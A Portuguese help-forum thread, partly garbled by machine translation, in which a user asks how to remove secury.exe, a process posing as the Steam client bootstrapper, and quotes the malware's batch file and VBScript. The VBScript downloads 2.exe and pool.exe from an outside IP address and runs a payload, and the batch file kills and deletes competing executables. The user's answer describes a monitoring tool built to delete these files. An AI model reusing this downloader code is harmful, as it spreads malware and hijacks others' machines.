Como matar permanentemente o bootstrapper do cliente de vapor

Navegue suas respostas
0

Eu tenho a seguinte situação no meu gerenciador de tarefas:

Eunãoseiquetipodeaplicativoé,masdefinitivamentenãoéobootstrapperdoclienteSteamporqueeunãooinstaleietambémnãoconsigodesinstalá-lo.

Seeutentardescobrirquetipodeaplicativoéessepasso:

Euvejoalgoassim:

NoutilitárioMSConfig,nãoencontreinadaparecidocomsecury.exe.

Quandoabroalocalizaçãodoarquivo,vejotrêsarquivos:

m.bat,b.exe,4.vbs.

Abaixosegueoconteúdodem.bat:

taskkill/f/t/imsecury.exec:\ProgramData\secury.exetaskkill/f/t/imkingsoft.exetaskkill/f/t/imexpl0rer.exetaskkill/f/t/imieplare.exevtaskkill/f/t/imnssm.exetaskkill/f/t/imMSASCui.exetaskkill/f/t/imSystemSettlngs.exetaskkill/f/t/imSystemSetting.exetaskkill/f/t/imProcess.exetaskkill/f/t/imwinlnlt.exetaskkill/f/t/imWindowsUpgrade.exetaskkill/f/t/immsdc.exetaskkill/f/t/imFiddlere.exetaskkill/f/t/imshovst.exetaskkill/f/t/imlqrtqe.exetaskkill/f/t/imapkls.exetaskkill/f/t/imwinlog.exetaskkill/f/t/imsvchosts.exetaskkill/f/t/imwin1ogins.exetaskkill/f/t/imshovsts.exetaskkill/f/t/imfcty.exetaskkill/f/t/imsoiuos.exetaskkill/f/t/imTrustedInstaller.exedelC:\Windows\System32\soiuos.exedelC:\Windows\Setup\TrustedInstaller.exedelC:\ProgramData\kingsoft.exedelC:\ProgramData\expl0rer.exedelC:\ProgramData\ieplare.exedelC:\ProgramData\nssm.exedelC:\ProgramData\MSASCui.exedelC:\ProgramData\SystemSettlngs.exedelC:\ProgramData\SystemSetting.exedelC:\ProgramData\Process.exedelC:\ProgramData\winlnlt.exedelC:\ProgramData\WindowsUpgrade.exedelC:\ProgramData\msdc.exedelC:\ProgramData\Fiddlere.exedelC:\ProgramData\shovst.exedelC:\ProgramData\lqrtqe.exedelC:\ProgramData\apkls.exedelC:\ProgramData\winlog.exedelC:\ProgramData\svchosts.exedelC:\ProgramData\win1ogins.exedelC:\ProgramData\shovsts.exedelC:\ProgramData\fcty.exedelC:\ProgramData\pool.exedelC:\ProgramData\pool2.exedelC:\ProgramData\pool3.exe

Próximapágina4.vbs:

SetxPost=CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://223.68.209.7:65510/2.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\ProgramData\s2.exe",2
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://223.68.209.7:65510/pool.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\ProgramData\pool2.exe",2
CreateObject("WScript.Shell").Run "C:\ProgramData\pool3.exe"
CreateObject("WScript.Shell").Run "del C:\ProgramData\pool3.exe"

O que posso fazer para impedir que secury.exe abuse dos recursos de computação do meu servidor?

P.S. Eu executei a verificação completa do Avast no meu computador, mas não encontrei nada de errado.

    
por Yuriy Zaletskyy 19.11.2017 / 11:31

1 resposta

0

Eu quero compartilhar uma solução alternativa que encontrei para o meu problema.

Como programador, criei um programa que monitora constantemente a pasta c:\ProgramData\ para quaisquer novos arquivos. E se alguns dos arquivos que pertencem a "bootstrappper de cliente de vapor" aparecerem dentro dessa pasta, meu programa excluirá esses arquivos antes que eles sejam executados. Se alguém precisar modificar esse utilitário, você poderá encontrá-lo em GitHub .

Depois de executar este antivírus primitivo (na verdade, antiPUP), meu sistema parou de ser lento. Mais um detalhe que é necessário para este programa funcionar com estabilidade é o requisito para criar a pasta c:\ProgramData\copyForVirus\ . Eu fiz o programa para criar uma cópia desses arquivos de vírus, a fim de analisá-los mais tarde em alguns ambientes mais VM Ware para o que são internals desses arquivos.

    
por 19.11.2017 / 23:24

Tags

'Novas' marcas nos itens do menu Iniciar do Windows 10 continuam retornando Histórico eterno de bash (rápido e eficiente na memória)